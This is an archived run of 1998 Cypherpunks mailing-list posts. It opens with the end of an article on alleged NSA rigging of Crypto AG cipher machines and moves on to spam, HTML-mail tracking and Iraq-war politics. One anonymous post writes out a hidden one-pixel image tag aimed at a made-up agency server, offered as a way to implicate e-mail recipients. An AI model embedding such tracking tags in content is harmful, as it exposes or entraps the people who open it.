the U.S. regularly provided Iraq's Saddam Hussein with 
top-secret communication intercepts by the U.S. National 
Security Agency (NSA).  Consider the evidence.

	When in 1991 the government of Kuwait paid the 
public relations firm of Hill & Knowlton ten million 
dollars to drum up American war fever against the evil 
dictator Hussein, it brought about the end of a long legacy 
of cooperation between the U.S. and Iraq.  Hill & 
Knowlton resurrected the World War I propaganda story 
about German soldiers roasting Belgian babies on 
bayonets, updated in the form of a confidential witness 
(actually the daughter of the Kuwaiti ambassador to the 
U.S.) who told Congress a tearful story of Iraqi soldiers 
taking Kuwaiti babies out of incubators and leaving them 
on the cold floor to die.  President George Bush then 
repeated this fabricated tale in speeches ten times over the 
next three days.

	What is remarkable about this staged turn of 
events is that, until then, Hussein had operated largely 
with U.S. approval.  This cooperation had spanned three 
successive administrations, starting with Jimmy Carter.  
As noted by John R. MacArthur, "From 1980 to 1988, 
Hussein had shouldered the burden of killing about 
150,000 Iranians, in addition to at least thirteen thousand 
of his own citizens, including several thousand unarmed 
Kurdish civilians, and in the process won the admiration 
and support of elements of three successive U.S. 
Administrations" [1].

	Hussein's artful slaughter of Iranians was aided by 
good military intelligence.  The role of NSA in the 
conflict is an open secret in Europe, the Middle East, and 
Asia.  Only in this country has there been a relative news 
blackout, despite the fact that it was the U.S. 
administration that let the crypto cat out of the bag.  

	First, U.S. President Ronald Reagan informed the 
world on national television that the United States was 
reading Libyan communications.  This admission was part 
of a speech justifying the retaliatory bombing of Libya for 
its alleged involvement in the La Belle discotheque 
bombing in Berlin's Schoeneberg district, where two U.S. 
soldiers and a Turkish woman were killed, and 200 others 
injured. Reagan wasn't talking about American 
monitoring of Libyan news broadcasts. Rather, his "direct, 
precise, and undeniable proof"  referred to secret 
(encrypted) diplomatic communication between Tripoli 
and the Libyan embassy in East Berlin.

	Next, this leak was compound by the U.S. 
demonstration that it was also reading secret Iranian 
communications.  As reported in Switzerland's Neue 
Zurcher Zeitung,  the U.S. provided the contents of 
encrypted Iranian messages to France to assist in the 
conviction of Ali Vakili Rad and Massoud Hendi for the 
stabbing death in the Paris suburb of Suresnes of the 
former Iranian prime minister Shahpour Bakhtiar and his 
personal secretary Katibeh Fallouch. [2]
 
	What these two countries had in common was they 
had both purchased cryptographic communication 
equipment from the Swiss firm Crypto AG. Crypto AG 
was founded in 1952 by the (Russian-born) Swedish 
cryptographer Boris Hagelin who located his company in  
Zug.  Boris had created the "Hagelin-machine", a 
encryption device similar to the German "Enigma".  The 
Hagelin machine was used on the side of the Allies in 
World War II.

	Crypto AG was an old and venerable firm, and 
Switzerland was a neutral country. So Crypto AG's 
enciphering devices for voice communication and digital 
data networks were popular, and customers came from 
130 countries. These included the Vatican, as well the 
governments of Iraq, Iran, and Libya.  Such countries 
were naturally skeptical of cryptographic devices sold in 
many NATO countries, so turned to relatively neutral 
Switzerland for communication security.

	Iran demonstrated its suspicion about the source of 
the leaks, when it arrested Hans Buehler, a top salesman 
for Crypto AG, in Teheran on March 18, 1992.  During 
his nine and a half months of solitary confinement in Evin 
prison in Teheran, Buehler was questioned again and 
again whether he had leaked Teheran's codes or Libya's 
keys to Western powers.  Luckily Buehler didn't know 
anything.  He in fact believed in his own sales pitch that 
Crypto AG was a neutral company and its equipment was 
the best.  They were Swiss, after all.  [3]

	Crypto AG eventually paid one million dollars for 
Buehler's release in January 1993, then promptly fired 
him once they had reassured themselves that he hadn't 
revealed anything important under interrogation, and 
because Buehler had begun to ask some embarrassing 
questions. Then reports appeared on Swiss television, 
Swiss Radio International, all the major Swiss papers, and 
in German magazines like Der Spiegel.  Had Crypto AG's 
equipment been spiked by Western intelligence services? 
the media wanted to know. The answer was Yes [4].

	 Swiss television traced the ownership of Crypto 
AG to a company in Liechtenstein, and from there back to 
a trust company in Munich. A witness appearing on Swiss 
television explained the real owner was the German 
government--the Federal Estates Administration. [5]

        According to Der Spiegel, all but 6 of the 6000 
shares of Crypto AG were at one time owned by Eugen 
Freiberger, who resided in Munich and was head of the 
Crypto AG managing board in 1982. Another German, 
Josef Bauer, an authorized tax agent of the Muenchner 
Treuhandgesellschaft KPMG, and who was elected to the 
managing board in 1970, stated that his mandate had 
come from the German company Siemens.  Other 
members of Crypto AG's management had also worked at 
Siemens. Was the German secret service, the 
Bundesnachrichtendienst (BND), hiding behind the 
Siemens' connection?

        So it would seem.  Der Spiegel reported that in 
October 1970, a secret meeting of the BND had discussed 
how the Swiss company Graettner could be guided into 
closer cooperation with Crypto AG, or could even merged 
with it. The BND additionally considered how "the 
Swedish company Ericsson could be influenced through 
Siemens to terminate its own cryptographic business." [6]

	A former employee of Crypto AG reported that he 
had to coordinate his developments with "people from 
Bad Godesberg". This was the location of the "central 
office for encryption affairs" of the BND, and the service 
instructed Crypto AG what algorithms to use to create the 
codes.  The employee also remembers an American 
"watcher", who strongly demanded the use of certain 
encryption methods.

	Representatives from NSA visited Crypto AG 
often. A memorandum of  a secret workshop at Crypto 
AG in August 1975, where a new prototype of an 
encryption device was demonstrated, mentions the 
participation of Nora L. Mackebee, an NSA 
cryptographer. Motorola engineer Bob Newman says that 
Mackebee was introduced to him as a "consultant".  
Motorola cooperated with Crypto AG in the seventies in 
developing a new generation of electronic encryption 
machines.   The Americans "knew Zug very well and gave 
travel tips to the Motorola people for the visit at Crypto 
AG," Newman told Der Spiegel.

	Knowledgeable sources indicate that the Crypto 
AG enciphering process, developed in cooperation with 
the NSA and the German company Siemans, involved 
secretly embedding the decryption key in the cipher text.  
Those who knew where to look could monitor the 
encrypted communication, then extract the decryption key 
that was also part of the transmission, and recover the 
plain text message.  Decryption of a message by a 
knowledgeable third party was not any more difficult than
it was for the intended receiver.  (More than one method 
was used.  Sometimes the algorithm was simply deficient, 
with built-in exploitable weaknesses.)

	Crypto AG denies all this, of course, saying such 
reports are ""pure invention".

	What information was provided to Saddam 
Hussein exactly?  Answers to this question are currently 
being sought in a lawsuit against NSA in New Mexico, 
which has asked to see "all Iranian messages and 
translations between January 1, 1980 and June 10, 1996". 
[7]

	The passage of top-secret communications 
intelligence to someone like Saddam Hussein brings up 
other questions.  Which dictator is the U.S. passing top 
secret messages to currently?  Jiang Zemin?  Boris 
Yeltsin?  

	Will Saddam Hussein again become a recipient of 
NSA largess if he returns to the mass slaughter of 
Iranians?  What exactly is the purpose of NSA anyway?

	One more question:  Who is reading the Pope's 
communications?


Bibliography

[1] John R. MacArthur, Second Front: Censorship and 
Propaganda in the Gulf War, Hill and Wang, New York, 
1992.

[2] Some of the background of this assassination can be 
found in "The Tehran Connection," Time Magazine, 
March 21, 1994.

[3] The Buehler case is detailed in Res Strehle, 
Verschleusselt: der Fall Hans Beuhler, Werd Verlag, 
Zurich, 1994.  

[4] "For years, NSA secretly rigged Crypto AG machines 
so that U.S. eavesdroppers could easily break their codes, 
according to former company employees whose story is 
supported by company documents,"  "No Such Agency, 
Part 4: Rigging the Game," The Baltimore Sun, December 
4, 1995.

[5] Reported in programs about the Buehler case that were 
broadcast on Swiss Radio International on May 15, 1994 
and July 18, 1994.

[6]  "Wer ist der befugte Vierte?":  Geheimdienste 
unterwandern den Schutz von Verschlusselungsgeraten," 
Der Spiegel 36, 1996.

[7] U.S. District Court for the District of New Mexico, 
William H. Payne, Arthur R. Morales, Plaintiffs, v. 
Lieutenant General Kenneth A. Minihan, USAF, Director 
of National Security Agency, National Security Agency, 
Defendant, CIV NO 97 0266 SC/DJS.

November 2, 1997
Web Page: http://www.aci.net/kalliste/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 19 Feb 1998 04:15:48 +0800
To: cypherpunks@Algebra.COM
Subject: No Subject
Message-ID: <199802182008.VAA17760@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain




Two spam-ignorati wrote:

>>Don't get me wrong; I don't *like* spam. But
>>for me it's a minor problem, certainly not
>>worthy of legal remedies. I'm willing to suffer
>>a certain level of foolish annoyance gladly
>>in return for liberty.

>Same for me. I can delete commercial advertisements ("spam") in
seconds.

I used to have the same attitude. But then I started running a mail
server.

Routinely I find spammers attempting to use my server as a relay for
their crap. The undeliverable notifications fill up my postmaster mail
box so that I have to spend much more than "a few seconds" to sort out
this virtual mail bomb from the legitimate notifications I need to do
something about.

Current I am chasing some asshole from ISP to ISP in Arizona, shutting
him down only to have him get a new account with another ISP and "mail
bomb" me from there.

I would gladly prosecute, as this person is no better than a thief,
stealing my resources and time so he can run his con.


BTW, the reason I sent anon is so other spammers don't get my host name
and try to use it as a relay.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 19 Feb 1998 11:14:59 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Where to buy Terra byte protein ram/rom... [slashdot.org]
Message-ID: <199802190322.VAA14603@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://www.slashdot.org/slashdot.cgi?mode=article&artnum=00000702

>    Gernot Bauer wrote in to tell us a bit more about organic chips. He
>    writes "Computer chips are nowerdays made on the base of silicon.
>    German computing magazine "c't" wrote about an Norwegian company
>    called Opticom which claims that its ready for series production of
>    organic mass memory (RAM/ROM and all that nice stuff). Imagine 170
>    Terra-Bytes for a few cents. Read here how it works and what you can
>    expect if this technology is widely used (the article was translated
>    to english). Will new types of real virus be able to trash not only
>    your system but also your hardware?"

Note this company is claiming 'series production' meaning you can go out and
buy them.

I tramped over the web but couldn't find a website for them. If anybody
knows somebody in Norway please ask them to contact the company and get us
some information...please.


    ____________________________________________________________________
   |                                                                    |
   |            When a man assumes a public trust, he should            |
   |            consider himself public property.                       |
   |                                                                    |
   |                                      Thomas Jefferson              |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Thu, 19 Feb 1998 14:14:03 +0800
To: cypherpunks@toad.com
Subject: SAHMD / Porlo
Message-ID: <009C2049.D1802500.47@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Netscape Communications" <hh-feedback@netscape.com>
Date: Thu, 19 Feb 1998 13:34:29 +0800
To: cypherpunks@toad.com
Subject: Email Survey Form
Message-ID: <1A33705099E@mail.selectnet.com>
MIME-Version: 1.0
Content-Type: text/plain








   Thank you for downloading one or more trial versions of Netscape Server
   applications from our Web site.  We appreciate your interest in taking
   the time to evaluate some of our newest and most exciting products.

   We would like to follow-up with you to learn more about your company
   environment and better understand your needs.  To do so, please click
   below or copy the URL site address listed below.

   http://netscape.web-register.com/cgi/netscape/form/www_form?x=141270     

   If you experience problems entering the site, and are prompted to enter a
   customer ID number; your number is 141270  - or you may call 1-888-349-3100.

   Netscape respects your online time and Internet privacy.  If you would
   prefer not to receive future online surveys, please go to the site listed
   above and click on the box that has unsubscribe.

   Thank you for your time,

   Netscape Communications













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Thu, 19 Feb 1998 14:55:57 +0800
To: cypherpunks@toad.com
Subject: SAHMD / Prologue 2/0 (kinda)
Message-ID: <009C204F.7D120320.1@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain



[Author's Note: This chapter, or continuation of the prologue,
 or whatever the fuck it is, contains an expose of the true
 diabolical nature of Lucky Green.
 Unfortunately, the only existing file-copy and printout are
 at the residence of a friend who is not currently at home,
 and it seems to be in my best interest to leave town in a
 hurry, without turning on my headlights and using only
 back roads and alleys.
 Anyone who is just so desperate to read Prologue 2/0 that
 they are peeing thier pants might want to email Jay Tolkoff
 at whatever internet address appears on Prologue 1/0 that
 was recently spammed to the CypherPunks list, pleading, 
 bribing, threatening or thanking him, in order to see if
 he might possibly be open to sending you (or the list) a
 copy of foresaid missive.
 At present, continuation of "Space Aliens Hide My Drugs"
 seems to be largely dependent upon the speed of my vehicle
 and the volume of my ammo supply. (The more things change,
 the more they remain insane.)
 And the good news is...
 As soon as I hit 'send', Baby and I will be hitting the
 road, under cover of darkness, with the sounds of Linda
 Lou and the Drifters belting out Leadbelly's "When I Was
 A Cowboy" in our wake.
 Don't get any on'ya...]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Thu, 19 Feb 1998 14:08:39 +0800
To: tcmay@got.net (Tim May)
Subject: Re: Dealing with Spam, Part 1
In-Reply-To: <v0310280ab110141da408@[207.167.93.63]>
Message-ID: <199802190557.XAA00934@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Tim May wrote:
> At 7:12 PM -0800 2/17/98, Marek Jedlinski wrote:
> >Did you read to the point in my post when I said I would happily shut up if
> >there *was* technology available? I agree with your "basic philosophy",
> 
> Suppose someone said, "I will happily shut up and stop proposing laws to
> restrict online pornography if someone shows me that there is technology
> available to block it."?
> 
> How about, "I will happily shut up if there is technology to block bad
> thoughts from reaching me. Otherwise, I favor censorship."

To add to this, the spam blocking technology is widely available and can be
used by anyone with half brain. My spam filters make me spend no more than 
a minute or so a day on quickly reviewing and deleting spams.

I do it by saving all messages that are likely to be spam to a separate
folder. A quick browse through subject lines of these messages is enough
to delete them really quickly.

In the future such spam detection is going to become a lot harder. Perhaps
a system where the first time sender pays a refundable digital fee to
the reader will become necessary.

	- Igor.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 19 Feb 1998 13:52:19 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Microsoft's World Domination Failing? [Forward]
Message-ID: <199802190558.XAA15432@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

>From somebody in the gun lobby industry who doesn't mind sharing their
opinion, though not their name...

Forwarded message:

> My attitude about Bill Gate$ is: Screw him!  Ever since he helped finance a
> recent anti-gun initiative in Washington state with over $1 million of
> personal cash, I've considered him an elitist jerk.  He recently sent out a
> chain e-mail in an attempt to collect e-mail addresses, offering $1,000 to
> any users who could stack 1,000 addresses below theirs.  I refused to
> forward it.


    ____________________________________________________________________
   |                                                                    |
   |            When a man assumes a public trust, he should            |
   |            consider himself public property.                       |
   |                                                                    |
   |                                      Thomas Jefferson              |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael H. Warfield" <mhw@wittsend.com>
Date: Thu, 19 Feb 1998 16:00:05 +0800
To: nobody@replay.com
Subject: Re: Which is secure
In-Reply-To: <199802190454.FAA04010@basement.replay.com>
Message-ID: <199802190548.AAA27163@alcove.wittsend.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous enscribed thusly:

> Which is secure block cypher,or stream cypher?
> Thanks

	Yes.

	In other words...  It depends on things other than merely whether
it's block cypher or stream cypher.  Religious adherents on BOTH sides
may differ (and prove the point).

	Mike
-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 19 Feb 1998 08:11:15 +0800
To: cypherpunks@cyberpass.net
Subject: Re: New technology around the corner [slashdot.org]
In-Reply-To: <199802181626.KAA11323@einstein.ssz.com>
Message-ID: <199802190002.BAA25350@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May wrote:

> Or how about plastic cubes that can store terabytes....


They work fine.  Just keep it in liquid nitrogen or you'll lose all your
data.

Backyard fabs?  Quite doable with MBE or electron beam lithography.  Just
don't expect to do any mass-production on such a setup.


There's possible, and then there's practical.  You've ranted on that
subject a lot.  ("AMD can't make enough chips.")





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 19 Feb 1998 08:25:32 +0800
To: cypherpunks@cyberpass.net
Subject: Re: New technology around the corner [slashdot.org]
In-Reply-To: <199802181626.KAA11323@einstein.ssz.com>
Message-ID: <199802190021.BAA28248@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May wrote:

> Or how about plastic cubes that can store terabytes....


They work fine.  Just keep it in liquid nitrogen or you'll lose all your
data.

Backyard fabs?  Quite doable with MBE or electron beam lithography.  Just
don't expect to do any mass-production on such a setup.


There's possible, and then there's practical.  You've ranted on that
subject a lot.  ("AMD can't make enough chips.")





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 19 Feb 1998 08:37:42 +0800
To: cypherpunks@toad.com
Subject: Re: Is spam really a problem?
In-Reply-To: <199802181733.SAA26244@basement.replay.com>
Message-ID: <199802190024.BAA28610@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Wei Dai wrote:

> The way I see it, the problem with spam isn't that it takes too much
> effort to delete them, but that it discourages useful advertisement
> through email. Email could be a very efficient way for companies to send
> valuable information to potential customers, but the incentives are such
> that virtually all unsolicited commercial email are of very low value
> and are deleted without being read.

Those of us outside of the Microsoft Marketing Machine have a different
opinion.  Frankly, I do not want to make Bill Gates's latest advertising
gimmick any more 'efficient' nor do I want to be his 'potential customer'.
I have had just about enough crap from Microsoft, which is why I deleted
JunkOS version 95, and use Linux instead.

When I open up my email and find twenty pieces of spam, like most people
I start hitting the delete key.  Last week I got a call from a friend...
"Didn't you get my email?"  "uh... no..."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mark@unicorn.com
Date: Thu, 19 Feb 1998 20:18:16 +0800
To: cypherpunks@cyberpass.net
Subject: MailGuard
Message-ID: <887890124.21343.193.133.230.33@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



>I think that this could easily be fixed by only sending out the request
>once then adding the address to the possiable spam list until a reply is
>received or there is user intervention.

Sure, but that doesn't stop the problem at the other end. According to
the company:

"Messages received from other copies of the 
program are either brought to the attention of the user, or (if the user 
so desires) result in the automatic transmission of a positive response to
the 
other copies of the program, which response causes the other copies of the 
program to 'approve' the user."

This implies that they have some 'magic marker' in the challenge messages
which forces the software to pass it on to the user. In which case, a
spammer can merely add this marker to his messages and they will get
through to anyone who has the software configured that way.

>I do not run WinBlows on any of my
>Inet connected machines so I can not test it here (well I could but I am
>not *that* intrested in it).

Ditto.

>Mailing list seem like they would be a problem as diferent mailing list
>use different formats. Unless the software is sophisticated enough to take
>this into account you could see alot of garbage being posted.

I've seen this problem with other active 'anti-spam' programs on other
lists; it's a real pain in the ass. They say the software handles lists
properly, but who knows?

>The fake e-mail address seems to be a real problem if they resolve to a
>valid domain let alone a valid e-mail address not belonging to the spamer.

Exactly; any kind of active anti-spam is a pain in the ass in this
case. I just filter and delete, which gets 95%+ of spam sent to my
account; 3MB in the last nine months, last I checked.

    Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 19 Feb 1998 13:07:18 +0800
To: cypherpunks@toad.com
Subject: Which is secure
Message-ID: <199802190454.FAA04010@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain




Which is secure block cypher,or stream cypher?
Thanks
 
        





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 19 Feb 1998 20:47:49 +0800
To: ptrei@securitydynamics.com (Trei, Peter)
Subject: Re: I was auto-outed by an IMG tag in HTML spam
In-Reply-To: <6B5344C210C7D011835C0000F8012766010035D1@exna01.securitydynamics.com>
Message-ID: <199802191234.HAA20433@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



| > -----Original Message-----
| > From:	Anonymous [SMTP:anon@anon.efga.org]
| 	[Trei, Peter]  [edited]
| > They sent a message to my
| > off-site address (along with those of other critics about whom
| > they wanted to know more).  It was an HTML message with an
| > embedded IMG tag.
| > 
| > When Netscape saw that IMG
| > tag, it happily connected to marketing's "customer" tracking
| > server, and downloaded the keyed graphic.
| > 
| > My boss just let me see the log he got from the marketing VP,
| > showing clearly that my workstation read the message.  

	What exactly did that log say?

oops.netscape.com - - [15/Feb/1998:13:55:53 +0200] "GET /sekrit/tracilords.gif"

????

	Doesn't clearly show anything.  Theres IPspoofing.  Theres log
spoofing.  There's being forwarded the message by a buddy (or someone
avoiding the entrapment by forwarding the mail (anonymously) to
cypherpunks, thus getting hundreds of people who are totally
uninvolved to see it.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 19 Feb 1998 15:23:42 +0800
To: cypherpunks@ssz.com
Subject: Re: I was auto-outed by an IMG tag in HTML spam
Message-ID: <199802190715.IAA21519@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



William H. Geiger III wrote:
>
>This could be a good sting opperation. Send an anonymous e-mail
>message that points to a childporn site. The [add your jackbooted
>thug orginization here] kick in your door as soon as they get the
>signal that your machine has connected to the site and downloaded
>the images.
>
>Hmmmm I wonder if there is a way to get the browser to DL an image
>without displaying it. The pictures would be sitting in your cache
>without even knowing it. Probably not a big issue I would imagine
>that a jury would convict on website logs alone even if no pictures
>were found on the machine.


<img src="http://sting.tla.gov/randpix.cgi" width=1 height=1>
would get shmeebs using netscab or microslop...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 19 Feb 1998 23:21:04 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Barnes & Nobles indicted on child porno... [CNN]
Message-ID: <199802191523.JAA16425@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>           NATION'S LARGEST BOOKSELLER CHARGED WITH CHILD PORNOGRAPHY
>                                        
>      February 18, 1998
>      Web posted at: 10:28 p.m. EST (0328 GMT)
>      
>      MONTGOMERY, Alabama (AP) -- An Alabama grand jury indicted the
>      nation's largest bookseller, Barnes & Noble, on child pornography
>      charges involving the sale of books by noted photographers whose
>      work includes pictures of nude children.
>      
>      State Attorney General Bill Pryor said Wednesday he started the
>      grand jury investigation after receiving complaints about two books
>      being sold at Barnes & Noble stores in Alabama: "The Age of
>      Innocence" by French photographer David Hamilton and "Radiant
>      Identities" by San Francisco photographer Jock Sturges.
>      
>      The indictment accuses the New York-based company of disseminating
>      "obscene material containing visual reproduction of persons under 17
>      years of age involved in obscene acts."


    ____________________________________________________________________
   |                                                                    |
   |            When a man assumes a public trust, he should            |
   |            consider himself public property.                       |
   |                                                                    |
   |                                      Thomas Jefferson              |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 20 Feb 1998 02:06:56 +0800
To: cypherpunks@Algebra.COM
Subject: Anthrax--The Horsemen are Riding
Message-ID: <v03102800b1121b2a31b1@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain




CNN is reporting a news flash, with few details, about two men being
arrested in Las Vegas for making or possessing or planning to make anthrax.
Details should be emerging, but I have a hunch it's a witch hunt, an
invocation of the Four Horsement, to drum up support for Clinton's Dirty
Little War.

Now, just what are the chances of such an arrest *exactly* as the USG is
rattling sabers over Saddam's alleged anthrax and other CBW items?

It seems highly likely that the word went out to local FBI offices to "beat
the bushes" to produce some news headlines.

"Find us some jimbells we can show to the American public as proof that an
undeclared, unsupported war with Iraq is justified."


Expect more raids on "terrorist cells." Expect more coincidental findings
of chemicals and supplies which _could_ be used to make banned items.

Expect the usual suspects, like Fineswine, to call for limits on free
communications ("which are being used by terrorists") and cryptography.

Meanwhile, expect no Congressional vote for Clinton's War with Saddam. Why
won't Congress declare war, as is its responsibility (clearly stated in the
Constitution)? The last time around, in 1990-1, there was a six-month
buildup to the start of the war, there was apparently overwhelming public
hatred of Saddam, there was a clear goal ("liberate Kuwait"), and there was
clear support by other nations, other Arab states, the United Nations, etc.

And yet the vote in Congress was very close...the Congress came very close
to not issuing a statement of support. (Of course, this was still not a
declaration of war, as the Constitution calls for, but it's about as close
as we ever get in this post-WW II "Executive" government, where Congress
never declares war, not even in Korea, Viet Nam, the Gulf, etc.)

And this time around the public's interest in Saddam is ho-hum, the support
of other nations is lukewarm to nonexistent, the goals of a war are
completely unclear, and Congress appears unwilling to vote support.

And yet the war will probably happen. Clinton, the draft dodger and antiwar
activist (factual statement, not a judgement on his actions in the 60s),
_needs_ a Nice Little War.

But I predict it will backfire. He'll kill ten thousand Iraqi women,
children, and other innocents, he'll incinerate some underground bunkers
holding terrified residents of Baghdad, and he'll bomb some pesticide
facilities.

But in a region as vast as Iraq is, does anybody think he'll destroy all of
those shock-resistant flasks and Thermos bottles carring whatever
biological goodies he's already made? When Clinton's minions stood and held
up bags of sugar and said "This much anthrax could kill everyone in
Washington," why, after the cheering stopped, didn't the obvious question
get asked: "And bombing Baghdad stops this bag of sugar from being used in
just _what_ way?"

If a couple of guys in Las Vegas can get busted for doing Illegal
Experiments, regardless of whether actual anthrax is ever found, then why
do we think Iraqi, Libyan, Sudanese, and other such nations have not long,
long had the means to disperse anthrax in nations which bomb them, kill
their children, and tell the U.N. to boycott them?

Like I always say, avoid "soft targets." Avoid the Schelling points for
attacks, the sites any self-respecting terrorist, freedom fighter, or
patriot would attack first.

When Washington, the president not the pesthole, advised us to "avoid
foreign wars," we should have heeded him. America has become Amerika,
Policeman to the World, ready to inject herself into foreign wars in
Bosnia, Haiti, Ruwanda, Somalia, Viet Nam, Korea, El Salvador, Kuwait, and
on and on.

"Pouring out the phials" may be rough justice for Amerika.


--Tim May

Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 20 Feb 1998 02:27:52 +0800
To: cypherpunks@Algebra.COM
Subject: PLO censoring pro-Iraqi sentiments
Message-ID: <v03102801b112264ccf41@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain




The PLO ("Palestinian Authority") has banned pro-Iraqi demonstrations and
has seized the offices of newspapers and radio stations with an editorial
bent against the upcoming War with Saddam.

(Last time around, of course, the PLO supported Saddam.)

So much for any pretense of freedom of speech and the press.

(Not that I ever held the PLO, or the State of Israel, or Iraq for that
matter, as any kind of exemplars.)

Just something to remember when considering the implications of these
foreign wars.

No doubt Madelyn Albright, William Cohen, and Sandy Berger would love to
have had such press controls yesterday in Columbus, Ohio, when their
policies were booed and heckled, and when the questions asked were the
common sense questions many of us are asking.....

I chortled to see tapes of this event being replayed over and over again in
Baghdad.

But not in Israel. At least not in PLO-controlled areas, now that
Washington is their New Master.

--Tim May

Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 20 Feb 1998 03:52:29 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Anthrax--The Horsemen are Riding
In-Reply-To: <v03102800b1121b2a31b1@[207.167.93.63]>
Message-ID: <v03102803b11239b85f86@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:59 AM -0800 2/19/98, Tim May wrote:
>CNN is reporting a news flash, with few details, about two men being
>arrested in Las Vegas for making or possessing or planning to make anthrax.
>Details should be emerging, but I have a hunch it's a witch hunt, an
>invocation of the Four Horsement, to drum up support for Clinton's Dirty
>Little War.

I'm now watching the FBI's news conference about this event. Very few
details, lots of scary stuff about deadly biological viruses....par for the
course.

The FBI guy cites the help of "Dougwood Proving Grounds." Er, I think he
means Dugway, but he's just a flack.

He mentioned that the raids were launched "hours" after an informant gave
them information. Ah, but how in this bureaucratic age did they get the
